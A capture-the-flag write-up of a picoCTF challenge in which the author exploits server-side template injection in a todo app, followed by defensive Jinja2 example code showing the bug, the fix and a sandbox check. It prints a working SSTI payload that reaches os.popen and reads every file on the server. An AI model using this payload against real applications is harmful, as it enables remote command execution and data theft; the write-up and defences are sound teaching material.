Agent 513! One of your dastardly colleagues is laughing very sinisterly! Can you access his todo list and discover his nefarious plans?
Empire2 had gone by pretty quickly. At this point, I just wanted to confirm to myself that they followed the pattern of the other two Empire challenges and had used a new vulnerability in the cards/todo titles.
I plugged in {{ 2 + 2 }} '
to see how it would behave, and to my surprise, it was vulnerable to SSTI again.
The next thing I did was to throw in my payload from Empire2. I was just hoping to get lucky:
{{ g.__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['sys'].modules['os'].popen("cat $(find . -type f) | grep picoCTF").read() }}
Seriously? That was easy. I solved it in like 30 seconds by reusing the payload. I guess I complicated Empire2 more than I needed to or something. Oh well. Easy 1.5k points.
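Why the {{ 2 + 2 }} probe above evaluates, and what the fix looks like, as an added example that is not the challenge's own code. It assumes a Jinja2-rendered title (consistent with the Flask `g` object in the payload); the function names and sample titles are hypothetical.

```python
# Added example: function names and sample titles are hypothetical.
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

env = Environment(autoescape=True)


def render_title_vulnerable(title):
    # BUG: the user-supplied title is concatenated into the template source,
    # so Jinja2 parses and evaluates any {{ ... }} expression inside it.
    return env.from_string("<li>" + title + "</li>").render()


def render_title_safe(title):
    # The template source is fixed. The title is passed as data, so it is
    # substituted (and HTML-escaped by autoescape) but never parsed as syntax.
    return env.from_string("<li>{{ title }}</li>").render(title=title)


def sandbox_blocks_dunder_walk():
    # Defense in depth for apps that must render user-authored templates:
    # the sandbox refuses underscore-prefixed attributes, which is the first
    # step of a __class__/__mro__ object walk.
    sandbox = SandboxedEnvironment()
    try:
        sandbox.from_string("{{ t.__class__.__mro__ }}").render(t="x")
    except SecurityError:
        return True
    return False


if __name__ == "__main__":
    probe = "{{ 2 + 2 }}"  # the harmless arithmetic probe from the write-up
    print(render_title_vulnerable(probe))  # expression is evaluated
    print(render_title_safe(probe))        # expression stays literal text
    print(sandbox_blocks_dunder_walk())
```

A title that comes back as 4 instead of the literal braces is the signal to look for in a code review or a test suite: it means user input reached the template source.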